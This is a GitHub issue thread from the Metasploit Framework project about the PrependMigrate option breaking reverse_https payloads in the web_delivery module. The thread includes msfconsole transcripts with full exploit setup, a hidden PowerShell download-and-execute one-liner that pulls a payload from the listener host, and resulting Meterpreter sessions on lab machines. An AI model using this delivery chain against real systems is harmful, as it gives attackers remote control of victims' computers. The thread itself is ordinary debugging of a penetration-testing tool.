### ISSUE TITLE
PrependMigrate with reverse_https using web delivery

### ISSUE THREAD

**Issue by mubix** [rapid7/metasploit-framework#4896]
```
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /         no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.1.100   yes       The local listener hostname
   LPORT     8443             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   2   PSH

msf exploit(web_delivery) >
[*] Using URL: http://0.0.0.0:8080/update
[*]  Local IP: http://192.168.1.100:8080/update
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.100:8080/update'))
[*] 192.168.1.101    web_delivery - Delivering Payload
```
Results in:
![image](https://cloud.githubusercontent.com/assets/679319/6547613/43cf7810-c5b3-11e4-98b7-fd7f742f456a.png)

**Comment by mubix** [comment]
reverse_tcp works just fine

**Comment by OJ** [comment]
It would seem that we're starting to see a few cases where the `_http(s)` payloads are failing when the `_tcp` payloads don't. Another example is the issue with `payload_inject` https://github.com/rapid7/metasploit-framework/issues/4845

**Comment by hmoore-r7** [comment]
@mubix What operating system?

**Comment by mubix** [comment]
Windows 7 x64

**Comment by bcook-r7** [comment]
I tried this on a pre-Nov2014 (KB3000850) update with Windows 8.1 x64 and did not see the issue. It sounds similar to #4845:

```
msf exploit(web_delivery) > [*] 192.168.56.101   web_delivery - Delivering Payload
[*] 192.168.56.101:49260 Request received for /UPqF...
[*] 192.168.56.101:49260 Staging connection for target /UPqF received...
[*] Meterpreter session 1 opened (192.168.56.1:8443 -> 192.168.56.101:49260) at 2015-03-09 10:35:47 -0500

msf exploit(web_delivery) >
msf exploit(web_delivery) > sessions -i

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter x86/win32  windows-8-vm\Brent Cook @ WINDOWS-8-VM  192.168.56.1:8443 -> 192.168.56.101:49260 (192.168.56.101)

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WINDOWS-8-VM
OS              : Windows 8.1 (Build 9600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
```

**Comment by bcook-r7** [comment]
I was wrong, wasn't using PrependMigrate. Why don't things like this show up with 'show options' ?

**Comment by hmoore-r7** [comment]
show advanced / show evasions

**Comment by hmoore-r7** [comment]
@mubix Can you retest this from the #4918 PR branch? ```PrependMigrate``` was horribly broken.

```
$ git pull master && git checkout upstream/pr/1674
$ ./msfconsole 
```

**Comment by bcook-r7** [comment]
Works for me on Windows 8.1:
```
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set Payload windows/meterpreter/reverse_https
Payload => windows/meterpreter/reverse_https
msf exploit(web_delivery) > set PrependMigrate true
PrependMigrate => true
msf exploit(web_delivery) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/zofGPrmKdNskXU
[*]  Local IP: http://192.168.22.62:8080/zofGPrmKdNskXU
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.56.1:8080/zofGPrmKdNskXU'))
[*] 192.168.56.101:50475 Request received for /d7zG...
[*] 192.168.56.101:50475 Staging connection for target /d7zG received...
[*] Meterpreter session 2 opened (192.168.56.1:8443 -> 192.168.56.101:50475) at 2015-03-12 09:13:37 -0500
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WINDOWS-8-VM
OS              : Windows 8.1 (Build 9600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
```

**Comment by mubix** [comment]
I copied all of my output, but no real need. Tested on x64 Win7, 2008, and 2012, all work with both x86 and x64 payloads (with the #4918 pull). I didn't test on x64 XP or 2003 so I will test that later tonight for completeness but I think we are good to close this as solved via that pull

**Comment by hmoore-r7** [comment]
@mubix Thanks!

**Comment by hmoore-r7** [comment]
Fixed by #4918

**Comment by cipherbz** [comment]
Hi guys, I got a problem.. here it stacks at:
[*] XXX.XXX.XXX.XXX    web_delivery - Delivering Payload

and nothing happens after that so what's the solution
XXX.XXX.XXX.XXX is an ip address

please help
